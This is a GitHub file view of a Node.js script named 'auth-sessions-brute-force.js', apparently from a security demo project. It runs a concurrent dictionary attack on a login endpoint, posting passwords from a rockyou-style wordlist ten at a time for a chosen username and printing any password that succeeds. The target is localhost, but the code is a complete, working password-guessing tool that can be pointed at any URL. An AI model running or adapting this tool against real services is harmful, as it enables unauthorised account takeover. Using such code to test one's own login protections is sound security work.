-
Notifications
You must be signed in to change notification settings - Fork 15
Expand file tree
/
Copy pathauth-sessions-brute-force.js
More file actions
78 lines (64 loc) · 2.14 KB
/
Copy pathauth-sessions-brute-force.js
File metadata and controls
78 lines (64 loc) · 2.14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import fs from "fs";
import readline from "readline";
const TARGET_URL = "http://localhost:3000/login";
const username = process.argv[2] ?? "alice";
const wordlistPath = process.argv[3] ?? "/usr/share/wordlists/rockyou-50.txt";
const CONCURRENCY = 10;
async function tryPassword(password) {
const res = await fetch(TARGET_URL, {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ username, password }),
});
return { password, success: res.status === 200 };
}
async function runChunk(passwords) {
return Promise.all(passwords.map(tryPassword));
}
async function bruteForce() {
console.log(`🎯 Target : ${TARGET_URL}`);
console.log(`👤 Username: ${username}`);
console.log(`📖 Wordlist: ${wordlistPath}\n`);
const rl = readline.createInterface({
input: fs.createReadStream(wordlistPath, { encoding: "latin1" }),
crlfDelay: Infinity,
});
let attempted = 0;
let chunk = [];
const startTime = Date.now();
for await (const line of rl) {
const password = line.trim();
if (!password) continue;
chunk.push(password);
if (chunk.length >= CONCURRENCY) {
const results = await runChunk(chunk);
attempted += results.length;
const found = results.find((r) => r.success);
if (found) {
const elapsed = ((Date.now() - startTime) / 1000).toFixed(1);
console.log(
`\n✅ PASSWORD FOUND after ${attempted} attempts (${elapsed}s)`,
);
console.log(` Username : ${username}`);
console.log(` Password : ${found.password}`);
process.exit(0);
}
process.stdout.write(`\r⏳ Tried ${attempted} passwords...`);
chunk = [];
}
}
// flush remaining chunk (wordlist end)
if (chunk.length > 0) {
const results = await runChunk(chunk);
attempted += results.length;
const found = results.find((r) => r.success);
if (found) {
console.log(
`\n✅ PASSWORD FOUND: ${found.password} (after ${attempted} attempts)`,
);
process.exit(0);
}
}
console.log(`\n❌ Password not found after ${attempted} attempts.`);
}
bruteForce().catch(console.error);